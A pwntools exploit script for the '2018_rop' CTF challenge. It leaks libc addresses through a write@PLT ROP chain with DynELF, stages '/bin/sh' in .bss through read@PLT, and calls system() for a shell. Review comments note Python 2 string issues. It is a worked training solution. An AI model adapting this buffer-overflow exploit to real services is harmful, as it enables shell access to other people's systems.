from pwn import *
# Spawn the local challenge binary; all later sends/recvs talk to this process.
p = process('./2018_rop')
# Fixed absolute addresses taken from the binary (per the variable names:
# write@GOT, write@PLT, _start, .bss, read@PLT).  Hard-coded absolute
# addresses only work for a non-PIE build — presumably the case here; verify
# with `checksec` before reuse on a different binary.
gotwrite = 0x0804A010
pltwrite = 0x080483A0
start = 0x080483C0
bss = 0x0804A020
pltread = 0x08048360
def leak(address):
    """Leak 4 bytes of process memory at ``address`` via a write@PLT ROP chain.

    Frame layout (32-bit cdecl): 140 filler bytes up to the saved return
    address, then write@PLT as the return target, ``start`` as write's return
    address (restarts the program so the overflow can be re-triggered), and
    the three arguments fd=1, buf=address, len=4.  DynELF calls this
    repeatedly to walk the linked libc.

    Returns the raw 4 bytes read back from stdout.

    NOTE(review): this is Python 2 style — ``'a' * 140`` is ``str`` while
    ``p32()`` returns ``bytes``, so under Python 3 pwntools the concatenation
    raises TypeError (``b'a' * 140`` would be needed).  Also ``p.recv(4)``
    returns *up to* 4 bytes; a short read would yield a truncated leak.
    """
    payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04)
    p.sendline(payload)
    leakaddress = p.recv(4)
    return leakaddress
# DynELF resolves libc symbols at runtime using only the 4-byte leak primitive
# above, so no libc version/offset database is required.
d = DynELF(leak, elf=ELF('./2018_rop'))
system_addr = d.lookup('system', 'libc')
# Stage 1: read(0, bss, 8) then return to `start` — copies the 8-byte string
# sent on the next line into writable .bss so it has a known address.
payload = 'a' * 140 + p32(pltread) + p32(start) + p32(0) + p32(bss) + p32(8)
p.send(payload)
p.send("/bin/sh\0")  # exactly 8 bytes, matching the length passed to read()
# Stage 2: system(bss); 0xdeadbeef is a dummy return address (never returned to).
# NOTE(review): same Python 2 str/bytes concatenation caveat as in leak().
payload = 'a' * 140 + p32(system_addr) + p32(0xdeadbeef) + p32(bss)
p.sendline(payload)
p.interactive()
铁人三项(第五赛区)2018 rop